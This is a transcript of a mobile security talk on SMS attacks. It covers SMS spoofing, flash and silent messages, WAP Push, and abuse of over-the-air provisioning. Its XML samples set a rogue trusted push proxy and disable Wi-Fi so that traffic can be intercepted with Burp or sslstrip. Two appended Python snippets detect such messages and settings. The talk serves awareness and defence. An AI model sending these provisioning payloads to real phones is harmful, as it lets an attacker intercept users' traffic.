Mobile Security - SMS Attacks

  1. Mobile Security – SMS Attacks
     Presenter: Bogdan ALECU, http://m-sec.net, Twitter: @msecnet
  2. Agenda
     • General information about SMS
     • Threats
     • WAP
     • Data traffic interception
     • Demo
  3. General information
     • SMS (Short Message Service) is a way of communicating through text messages between mobile / fixed phones, using a standardized protocol.
     • It is an effective means of communication: the user writes a text, presses SEND, and the message is delivered almost instantly to the recipient.
     • Used for several purposes: MMS (Multimedia Messaging Service), OTA (Over The Air) phone configuration, notifications for voicemail, email and fax, micropayments (paying small amounts for various services) => SECURITY!
  4. General information
     "An active mobile device must be able to receive a short message TPDU - Transfer Protocol Data Unit - (SMS-DELIVER) at any time, regardless of whether a call or data traffic is in progress. A report will always be sent to the SC (the message service), confirming either that the phone received the message or that the message was not delivered, including the reason for the refusal."
     ETSI TS 100 901 V7.5.0 (2001-12), p. 13
  5. Threats - SMS
     • SMS spam
     • SMS spoofing
     • SMS notifications
     • Other types
  6. Threats - SMS: SMS spam
     • Companies offer advertising services via SMS
     • Messages about fake prizes
     • Social engineering – "Call me urgently on this number: 0900323421! Mom"
  7. Threats - SMS: SMS spoofing
     • Online services that allow the sender to be changed (numeric / alphanumeric)
     • Hard to stop, especially when roaming is taken into account
     • More effective in social engineering attacks
  8. Threats - SMS: SMS notifications
     • Voicemail
     • Fax
     • E-mail
     • Video
     • The user cannot remove the notification icon shown when such a message is received
  9. Threats - SMS: SMS notifications (voicemail)
  10. Threats - SMS: SMS notifications (email)
  11. Threats - SMS: Other types
     • Flash SMS (Class 0) – the user sees the message directly, without opening the Inbox
     • Silent SMS – DCS 0xC0 = Message Waiting Indication Group: Discard Message
  12. Threats - SMS: Other types, Flash SMS
  13. Threats - SMS: Other types, Silent SMS
  14. WAP
     • Wireless Application Protocol
     • Specific network architecture
     • Set of rules
     • Specific language: Wireless Markup Language (WML)
     • HTML pages adjusted to the size of the phone's screen
  15. WAP
  16. WAP Push
     • Allows WAP content to be sent with minimal intervention from the user
     • 2 types: Service Indication / Service Load
  17. WAP Push
     • Service Indication (SI) allows notifications to be sent to the user asynchronously
  18. WAP Push: Service Indication (SI)
  19. WAP Push
     • Service Load (SL) causes the "application" on the phone to load and execute a service
  20. WAP Push: Service Load (SL)
  21. WAP Push - security
     • Theory: only a specific number is authorized to send such messages
     • Practice: if it is not configured properly, a phone accepts such messages from any number
     • On Windows Mobile, the settings under HKLM\Security\Policies\Policies must be checked:

       ; SL Message Policy
       ; (default: SECROLE_PPG_TRUSTED)
       [HKEY_LOCAL_MACHINE\Security\Policies\Policies]
       "0000100c"=dword:800

       ; SI Message Policy
       ; (default: SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED)
       [HKEY_LOCAL_MACHINE\Security\Policies\Policies]
       "0000100d"=dword:c00

  22. WAP Push - security
     • SECROLE_PPG_TRUSTED: Trusted Push Proxy Gateway. Messages assigned this role indicate that the content sent by the Push Initiator is trusted by the Push Proxy Gateway. This role implies that the device trusts the Push Proxy Gateway (SECROLE_TRUSTED_PPG).
     • SECROLE_PPG_AUTH: Push Initiator Authenticated. Messages assigned this role indicate that the Push Initiator is authenticated by the Push Proxy Gateway. This role implies that the device trusts the Push Proxy Gateway (SECROLE_TRUSTED_PPG).
  23. WAP Push - security
  24. WAP
     • The phone can be configured manually for Internet / data access
     • To make configuration easier and faster, and to handle later changes, a standard was created that allows remote configuration
     • Over The Air (OTA) programming uses the OMA (Open Mobile Alliance) standard
     • Programming is done through specially crafted SMS messages
  25. WAP - provisioning
     Uses the WAP protocol:
     • WBXML (WAP Binary XML) via Wireless Application Environment
     • Wireless Session Protocol
     • Wireless Datagram Protocol
     • SMS
  26. WAP - provisioning
     • The configuration is written in XML (according to the specifications at http://www.openmobilealliance.org)
     • The XML is encoded as WAP Binary XML
     • The WBXML is encapsulated in Wireless Session Protocol data
     • The data is encoded in a Push message, defined in Wireless Session Protocol
  27. WAP - provisioning
     • The Push message contains various parameters, one of them being the "SEC" parameter for authentication based on a shared "key"
     • USERPIN: ASCII string encoded in decimal
     • NETWPIN: the key is specific to the network and known (in theory) only to the operator
     • USERNETWPIN: a combination of the two
  28. WAP - provisioning
     • NETWPIN: IMSI = MCC+MNC+MSIN (Mobile Subscription Identification Number)
     • Price: 2-5 euro cents
     • Generally limited to companies; a large volume of queries is required
  29. WAP - provisioning

       <wap-provisioningdoc>
         <characteristic type="NAPDEF">
           <parm name="NAME" value="NewAPN"/>
           <parm name="NAPID" value="NewAPN_NAPID_ME"/>
           <parm name="BEARER" value="GSM-GPRS"/>
           <parm name="NAP-ADDRESS" value="apn.operator.ro"/>
           <parm name="NAP-ADDRTYPE" value="APN"/>
         </characteristic>
         <characteristic type="APPLICATION">
           <parm name="NAME" value="NewAPN"/>
           <parm name="APPID" value="w2"/>
           <parm name="TO-NAPID" value="NewAPN_NAPID_ME"/>
         </characteristic>
       </wap-provisioningdoc>

  30. WAP - provisioning
     • <wap-provisioningdoc> - contains all the information transmitted
     • <characteristic …> - groups the information into logical units
     • <… value="NAPDEF"/> - configures a new network access point
     • <parm name="APPID" value="w2"/> - maps the configuration to browsing activities
     • More information at http://www.openmobilealliance.org
  31. WAP - provisioning

       <wap-provisioningdoc>
         <characteristic type="BOOTSTRAP">
           <parm name="NAME" value="Operator NET"/>
           <parm name="PROXY-ID" value="OpNET_Proxy"/>
         </characteristic>
         <characteristic type="NAPDEF">
           <parm name="NAME" value="OpNET"/>
           <parm name="NAPID" value="OpNET_NAPID"/>
           <parm name="BEARER" value="GSM-GPRS"/>
           <parm name="NAP-ADDRESS" value="net"/>
           <parm name="NAP-ADDRTYPE" value="APN"/>
         </characteristic>

  32. WAP - provisioning (document continued)

         <characteristic type="PXLOGICAL">
           <parm name="NAME" value="OpNET"/>
           <parm name="PROXY-ID" value="OpNET_Proxy"/>
           <characteristic type="PXPHYSICAL">
             <parm name="PHYSICAL-PROXY-ID" value="OpNET_PhProxy"/>
             <parm name="PXADDR" value="192.168.1.1"/>
             <parm name="PXADDRTYPE" value="IPV4"/>
             <parm name="TO-NAPID" value="OpNET_NAPID"/>
             <characteristic type="PORT">
               <parm name="PORTNBR" value="8080"/>
             </characteristic>
           </characteristic>
         </characteristic>

  33. WAP - provisioning (document continued)

         <characteristic type="APPLICATION">
           <parm name="APPID" value="w2"/>
           <parm name="NAME" value="OpNET"/>
           <parm name="TO-PROXY" value="OpNET_Proxy"/>
           <characteristic type="RESOURCE">
             <parm name="NAME" value="OpNET"/>
             <parm name="URI" value="http://www.google.com"/>
             <parm name="STARTPAGE"/>
           </characteristic>
         </characteristic>
       </wap-provisioningdoc>

  34. WAP - provisioning
     • In theory this configuration can be done only by the operator, from a predefined number
     • We can analyze the SMS with Wireshark
     • We can add another number
  35. WAP - provisioning

       <?xml version="1.0"?>
       <!DOCTYPE wap-provisioningdoc PUBLIC "-//WAPFORUM//DTD PROV 1.0//EN" "http://www.wapforum.org/DTD/prov.dtd">
       <wap-provisioningdoc version="1.1">
         <characteristic type="BOOTSTRAP">
           <parm name="NAME" value="Nume"/>
         </characteristic>
         <characteristic type="PXLOGICAL">
           <parm name="NAME" value="Nume"/>
           <parm name="PROXY-ID" value="Trusted_Proxy"/>
           <parm name="NAME" value="Trusted Proxy"/>
           <characteristic type="PXPHYSICAL">
             <parm name="PHYSICAL-PROXY-ID" value="Trusted_PhProxy"/>
             <parm name="PXADDR" value="40711111111"/>
             <parm name="PXADDRTYPE" value="E164"/>
             <parm name="TO-NAPID" value="Trusted_NAPID"/>
             <parm name="PUSHENABLED" value="1"/>
             <parm name="PULLENABLED" value="1"/>
           </characteristic>
         </characteristic>
         <characteristic type="NAPDEF">
           <parm name="NAME" value="Op"/>
           <parm name="NAPID" value="Trusted_NAPID"/>
           <parm name="BEARER" value="GSM-SMS"/>
           <parm name="NAME" value="Trusted Proxy"/>
           <parm name="NAP-ADDRESS" value="40711111111"/>
           <parm name="NAP-ADDRTYPE" value="E164"/>
         </characteristic>
       </wap-provisioningdoc>

  36. WAP - provisioning

       <wap-provisioningdoc>
         <characteristic type="NetworkPolicy">
           <characteristic type="WiFi">
             <characteristic type="Settings">
               <parm name="Disabled" value="1"/>
             </characteristic>
           </characteristic>
         </characteristic>
       </wap-provisioningdoc>

  37. Traffic interception
     • The traffic passes through our proxy
     • Option 1 – Burp Proxy
  38. Traffic interception
     • The traffic passes through our proxy
     • Option 2 – sslstrip, http://www.thoughtcrime.org/software/sslstrip/
  39. Traffic interception: DEMO
  40. Protection
     • The operator can filter these types of messages
     • Phone manufacturers must focus more on security
     • Check your Internet settings constantly (just as you do with your bill / available credit)
  41. Questions?
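
Slide 11 identifies flash and silent messages by their TP-DCS octet. The following Python is an added example, not part of the original presentation: it classifies a DCS value by the coding groups of 3GPP TS 23.038 so a message log can be reviewed for these types. The function names and the sample log are assumptions of this example.

```python
MWI_TYPES = {0: "voicemail", 1: "fax", 2: "email", 3: "other"}

def classify_dcs(dcs):
    """Decode one TP-DCS octet into the properties a filter or log review cares about."""
    if not 0 <= dcs <= 0xFF:
        raise ValueError("TP-DCS is a single octet")
    group = dcs >> 4
    info = {"kind": "normal", "msg_class": None, "flags": []}
    if group <= 0x7:
        # 00xx general data coding, 01xx marked for automatic deletion.
        # Bits 1..0 carry a message class only when bit 4 is set.
        if dcs & 0x10:
            info["msg_class"] = dcs & 0x03
        if group >= 0x4:
            info["flags"].append("auto-delete")
    elif group <= 0xB:
        info["kind"] = "reserved"
    elif group <= 0xE:
        # 1100 discard, 1101 store (GSM 7-bit), 1110 store (UCS2).
        info["kind"] = "mwi"
        info["mwi_type"] = MWI_TYPES[dcs & 0x03]
        info["mwi_active"] = bool(dcs & 0x08)
        if group == 0xC:
            info["flags"].append("silent")  # text may be discarded, only the indicator changes
    else:
        info["msg_class"] = dcs & 0x03      # 1111: class bits always present
    if info["msg_class"] == 0:
        info["flags"].append("flash")       # displayed immediately, not stored in the Inbox
    return info

def needs_review(messages):
    """messages: iterable of (sender, dcs). Return the entries flagged flash or silent."""
    out = []
    for sender, dcs in messages:
        flags = classify_dcs(dcs)["flags"]
        if "flash" in flags or "silent" in flags:
            out.append((sender, f"0x{dcs:02X}", flags))
    return out

# Constructed sample: sender labels and DCS octets invented for this example.
SAMPLE_LOG = [("+40700000001", 0x00), ("+40700000002", 0x10),
              ("Operator", 0xC8), ("+40700000003", 0xC0), ("+40700000004", 0xF4)]

if __name__ == "__main__":
    for entry in needs_review(SAMPLE_LOG):
        print(entry)
```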
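
Slide 40 recommends checking the phone's Internet settings regularly, and slides 35 to 37 show what a provisioning message can change. The following Python is an added example, not from the presentation: it audits a wap-provisioningdoc against allowlists of the operator's access points and proxies. The function names, the allowlists and the constructed sample document are assumptions of this example.

```python
import xml.etree.ElementTree as ET

def parms(node):
    """Direct <parm> children of a <characteristic>, as a name -> value dict."""
    return {p.get("name"): p.get("value", "") for p in node.findall("parm")}

def audit(xml_text, allowed_apns, allowed_proxies):
    """Return a list of findings for a wap-provisioningdoc (empty list = nothing flagged)."""
    if "<!ENTITY" in xml_text:  # do not expand entities from an untrusted message
        return ["document declares XML entities; not parsed"]
    findings = []
    for ch in ET.fromstring(xml_text).iter("characteristic"):
        ctype, p = ch.get("type"), parms(ch)
        if ctype == "NAPDEF" and p.get("NAP-ADDRESS") not in allowed_apns:
            findings.append(f"NAPDEF: unknown access point {p.get('NAP-ADDRESS')!r}")
        elif ctype == "PXPHYSICAL":
            addr = p.get("PXADDR")
            if addr not in allowed_proxies:
                findings.append(f"PXPHYSICAL: traffic would use unknown proxy {addr!r}")
            if p.get("PXADDRTYPE") == "E164" and p.get("PUSHENABLED") == "1":
                findings.append(f"PXPHYSICAL: number {addr!r} becomes a push-enabled proxy")
        elif ctype == "WiFi":
            for s in ch.findall("characteristic[@type='Settings']"):
                if parms(s).get("Disabled") == "1":
                    findings.append("NetworkPolicy: Wi-Fi would be disabled")
    return findings

# Constructed sample (addresses from documentation ranges, not from the slides).
SAMPLE_DOC = """<wap-provisioningdoc>
  <characteristic type="PXLOGICAL">
    <parm name="PROXY-ID" value="P1"/>
    <characteristic type="PXPHYSICAL">
      <parm name="PXADDR" value="192.0.2.10"/>
      <parm name="PXADDRTYPE" value="IPV4"/>
    </characteristic>
  </characteristic>
  <characteristic type="NAPDEF">
    <parm name="NAP-ADDRESS" value="apn.example.net"/>
  </characteristic>
</wap-provisioningdoc>"""

if __name__ == "__main__":
    for line in audit(SAMPLE_DOC, {"apn.operator.example"}, {"198.51.100.1"}):
        print(line)
```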
